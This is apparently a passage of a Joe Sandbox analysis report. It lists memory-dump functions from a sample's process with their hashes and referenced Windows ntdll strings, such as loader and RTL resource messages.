                                                        • Opcode Fuzzy Hash: 19cbc1bf45abc3cdc782c1c770347e120062cb515a18e6791e6ef611c46aa598
                                                        • Instruction Fuzzy Hash: 0871D074A00209DFEB04DF69C981BAEB7F8FB48328F154269E401E7610E739AD42CF51
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: LdrpUnloadNode$Unmapping DLL "%wZ"$minkernel\ntdll\ldrsnap.c
                                                        • API String ID: 3446177414-2283098728
                                                        • Opcode ID: 7ae27dae8e7629972db800b70c6b9197d2cedd66f9baa3add9c25b1730c842ae
                                                        • Instruction ID: 55364f9dd128913a2662f11adac9a67c993860dabb998c5c7446c6b8645a3edb
                                                        • Opcode Fuzzy Hash: 7ae27dae8e7629972db800b70c6b9197d2cedd66f9baa3add9c25b1730c842ae
                                                        • Instruction Fuzzy Hash: FF5136B17047899BE711DF24C880B2977ADBB8433CF00076CE5969BA91DB74E861CB83
                                                        APIs
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 379682E8
                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 379682DE
                                                        • Failed to reallocate the system dirs string !, xrefs: 379682D7
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 3446177414-1783798831
                                                        • Opcode ID: 423fab8589ea6b4c83dd01458d0b6c8f286e1a1f5cce48652abbf54f71c94941
                                                        • Instruction ID: 2a2dcd9302326db35266bc5f2903a111738f8c4fddb4f7156f6919edae868711
                                                        • Opcode Fuzzy Hash: 423fab8589ea6b4c83dd01458d0b6c8f286e1a1f5cce48652abbf54f71c94941
                                                        • Instruction Fuzzy Hash: 7F41F2B5564304AFE720EB24D845B4B77ECAF49768F00072AF844A3760E779E8019B92
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 37967B8E
                                                        • RTL: Re-Waiting, xrefs: 37967BAC
                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 37967B7F
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 0-871070163
                                                        • Opcode ID: 7a97bafa1df1d9e8b7cc79c3f734843ab94a6ec6914e02590afa3f51791434f7
                                                        • Instruction ID: 6566743f232b62d3563c41d716ff225f6297892aaf69df79113674dcb3bc8b36
                                                        • Opcode Fuzzy Hash: 7a97bafa1df1d9e8b7cc79c3f734843ab94a6ec6914e02590afa3f51791434f7
                                                        • Instruction Fuzzy Hash: 4F41E1357017069FE710EE25CC41B5AB7E9EF98728F000B1DF959AB680EB70E4059F92
                                                        APIs
                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 3796728C
                                                        Strings
                                                        • RTL: Resource at %p, xrefs: 379672A3
                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 37967294
                                                        • RTL: Re-Waiting, xrefs: 379672C1
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                        • API String ID: 885266447-605551621
                                                        • Opcode ID: 9eeda00b52db1526587675c77ef4a2a06b77e94cd1c4b473d98708b49a83e8e9
                                                        • Instruction ID: d8c13a5476f72cc6f0ee50fbfc0543b1d6b506956e374f8181d795be3864979d
                                                        • Opcode Fuzzy Hash: 9eeda00b52db1526587675c77ef4a2a06b77e94cd1c4b473d98708b49a83e8e9
                                                        • Instruction Fuzzy Hash: 6D41DE7560020AAFE710DE25CC81F56B7EAFF4472CF100719F854AB240EB24F8569BD2
                                                        APIs
                                                        Strings
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 37974888
                                                        • LdrpCheckRedirection, xrefs: 3797488F
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 37974899
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 3446177414-3154609507
                                                        • Opcode ID: 5e54c195b5e7ca646ec3be9c03c14d98c8c8b61c4e79d2fc498d8d843feb4d9c
                                                        • Instruction ID: f1b512ecc3bf5334d288807e9ba465bf9202f5f32bd9338bce6cd6c8fd1bc954
                                                        • Opcode Fuzzy Hash: 5e54c195b5e7ca646ec3be9c03c14d98c8c8b61c4e79d2fc498d8d843feb4d9c
                                                        • Instruction Fuzzy Hash: 3841B076A04395DFDB11CE68D840A56B7E8BF496A8F010769ECD4AB332D730E800CB91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: %%%u$]:%u
                                                        • API String ID: 48624451-3050659472
                                                        • Opcode ID: e032ba96fe0582ca56777c1cbe591d282a384e7b54c57cf24a162421adb5b36b
                                                        • Instruction ID: 8f9b129ce74dd1928484360168cc033e698ca7ee73158667202cf1ee37f9f898
                                                        • Opcode Fuzzy Hash: e032ba96fe0582ca56777c1cbe591d282a384e7b54c57cf24a162421adb5b36b
                                                        • Instruction Fuzzy Hash: 043186769012299FDB50CE29CC40BEE77FCEF45654F810695E849E7200EF34AA548FA1
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: Wow64 Emulation Layer
                                                        • API String ID: 3446177414-921169906
                                                        • Opcode ID: 6c254fe62795a585afefbb823eb53738ec2da556799b09980d4af92d427ea3bf
                                                        • Instruction ID: 23e20eed20db4168565ea1654a1a65fe4ca9e22dbdb49a0993e4d79f931b975c
                                                        • Opcode Fuzzy Hash: 6c254fe62795a585afefbb823eb53738ec2da556799b09980d4af92d427ea3bf
                                                        • Instruction Fuzzy Hash: B92117B691015DBFEB01DAA09C89DFFBB7DEF452DCB040164FA05A2110EA34EE159F62
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 35131d47b69dcb228d4580280bc95e3ecb7ef773c61abc82a2f57386a3987989
                                                        • Instruction ID: 0546da4a400c1e6ec193315fec3fd342911c3b24071ee81b9710ad126a8ff083
                                                        • Opcode Fuzzy Hash: 35131d47b69dcb228d4580280bc95e3ecb7ef773c61abc82a2f57386a3987989
                                                        • Instruction Fuzzy Hash: 9EE1E374D0170CDFDB21CFA9C980A9DBBF6BF48368F10466AE845A7662D774A851CF10
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: 4f554d7cef3004e98e7ec5f2773d6692cd8f24c23d8e55fdfcf2bda6e3522362
                                                        • Instruction ID: 0f958232b101b8ea4424e58ffc98adb328474ec5267d3f51863524e43a05b72a
                                                        • Opcode Fuzzy Hash: 4f554d7cef3004e98e7ec5f2773d6692cd8f24c23d8e55fdfcf2bda6e3522362
                                                        • Instruction Fuzzy Hash: 9D7139B1E00219DFDF00CFA4C988ADDBBB6BF48368F55422AE905FB250D734A905CB61
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: dc64c52e88a9faeaaf209f9be7f113d97fc50ae827f4045c04dc905fb3d9c83d
                                                        • Instruction ID: 21a59206a37620676f33869d478e98fa3a0c9e053510b50484a348b683f35daa
                                                        • Opcode Fuzzy Hash: dc64c52e88a9faeaaf209f9be7f113d97fc50ae827f4045c04dc905fb3d9c83d
                                                        • Instruction Fuzzy Hash: 87515974710A539FEF18CE18C9D5A2977E5FB89368B10826DDA06DB720DB74EC41CB82
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID:
                                                        • API String ID: 3446177414-0
                                                        • Opcode ID: cf3f908027bc681a46333278bbea2e8321cfa4e34b60062bb825c725b56aa839
                                                        • Instruction ID: 34ea0f9c70a2e0f5e4a201d750f0d3a43606b264b7fbf6c397e4b950a6e95e3f
                                                        • Opcode Fuzzy Hash: cf3f908027bc681a46333278bbea2e8321cfa4e34b60062bb825c725b56aa839
                                                        • Instruction Fuzzy Hash: 5B5126B5E00219DFEF04CF99D949ADDBBB6BF483A8F14822AE815B7250D734A901CF54
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes$BaseInitThreadThunk
                                                        • String ID:
                                                        • API String ID: 4281723722-0
                                                        • Opcode ID: a9dfe3db3fe9008a053b64bb81f8e2709ffaf8ef1b68474ddf386bee7dffbe50
                                                        • Instruction ID: 878c3449c26c36381d0f1306c342da79a19ddf7a19327b2117a96586d1e553f3
                                                        • Opcode Fuzzy Hash: a9dfe3db3fe9008a053b64bb81f8e2709ffaf8ef1b68474ddf386bee7dffbe50
                                                        • Instruction Fuzzy Hash: A8314575E54228EFDF11DFA8D845A9DBBF0BB48328F10426AE411B72A0DB389901CF55
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @
                                                        • API String ID: 0-2766056989
                                                        • Opcode ID: 7f52e360d500f3c218776ebcee84109f7cf1a7bafb279b6e7387b1f3656523d0
                                                        • Instruction ID: a2f3c66d4014d74324f8ef02897182e048b9c497f32f46e81b48fb03343581a5
                                                        • Opcode Fuzzy Hash: 7f52e360d500f3c218776ebcee84109f7cf1a7bafb279b6e7387b1f3656523d0
                                                        • Instruction Fuzzy Hash: 8E325770D05369DFEB21CF68D884BEDBBB4BB18314F0042E9D459A7241DB769A84CF91
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: __aulldvrm
                                                        • String ID: +$-
                                                        • API String ID: 1302938615-2137968064
                                                        • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction ID: e227c29faaeb6205a1964df2856e2f59ff297b7264ea0cfa248e1a59fc07e4a0
                                                        • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                        • Instruction Fuzzy Hash: C791A474E022069AFB20CE69CCC1AAEB7B9FF44379F50471EE855A72D0DB7499408F21
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 0$Flst
                                                        • API String ID: 0-758220159
                                                        • Opcode ID: 63ee550f1dae99d8dd6be80bdc58d2af4d24967d4c2e3886f27a0dbd13fc0be9
                                                        • Instruction ID: c1e941cb6de8edb474c193bdfb3dd006721040f6842dc590d017f661985aaa92
                                                        • Opcode Fuzzy Hash: 63ee550f1dae99d8dd6be80bdc58d2af4d24967d4c2e3886f27a0dbd13fc0be9
                                                        • Instruction Fuzzy Hash: 9751AFB5E01618CFEB14DF95C444659FBF8EF487ACF14822AD0499B268EB70AD45DB80
                                                        APIs
                                                        Strings
                                                        • kLsE, xrefs: 378F0540
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 378F063D
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 3446177414-2547482624
                                                        • Opcode ID: 968b94f34deaa387bd964f818b99353a5329b5ded1e748f29ab409667a0bdc27
                                                        • Instruction ID: c79664cc40a8923eeb1c6c59020d12eb91facaf12f527e4d85927973b9819035
                                                        • Opcode Fuzzy Hash: 968b94f34deaa387bd964f818b99353a5329b5ded1e748f29ab409667a0bdc27
                                                        • Instruction Fuzzy Hash: BA51BFB560474A8FD314DF64D4406A7B7E4AF98314F00893EE9E9C7240E77AE545CF92
                                                        APIs
                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 3797CFBD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: CallFilterFunc@8
                                                        • String ID: @$@4Cw@4Cw
                                                        • API String ID: 4062629308-3101775584
                                                        • Opcode ID: a602a805cf63531fd387eac877b8f4a8c3a63959a1a4e73757aaabc316df56eb
                                                        • Instruction ID: 94c7b16edc4fe58bcdc1e286e4d6473e4ce1a2ebcc6e4f1627fec329caca60bf
                                                        • Opcode Fuzzy Hash: a602a805cf63531fd387eac877b8f4a8c3a63959a1a4e73757aaabc316df56eb
                                                        • Instruction Fuzzy Hash: B7418FB5900258DFDB21CFA5C840A6EBBF8FF49718F00426AE915EB661D738D941CF62
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000006.00000002.3561108031.00000000378C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 378C0000, based on PE: true
                                                        • Associated: 00000006.00000002.3561108031.00000000379E9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.00000000379ED000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000006.00000002.3561108031.0000000037A5E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_6_2_378c0000_0GuwV0t2UU.jbxd
                                                        Similarity
                                                        • API ID: DebugPrintTimes
                                                        • String ID: 0$0
                                                        • API String ID: 3446177414-203156872
                                                        • Opcode ID: 77c11f0b9cdef122a2199c99e58022eca7546617d764d3153b5f28469a9dfac3
                                                        • Instruction ID: 7005946ad23ba64a6ac5b8274c0435a9fd4d12752d9a55006c33918871d649b0
                                                        • Opcode Fuzzy Hash: 77c11f0b9cdef122a2199c99e58022eca7546617d764d3153b5f28469a9dfac3
                                                        • Instruction Fuzzy Hash: 67416FB56087059FD300CF28C544A16BBE8BF89368F044A2EF988DB751D775E909CF96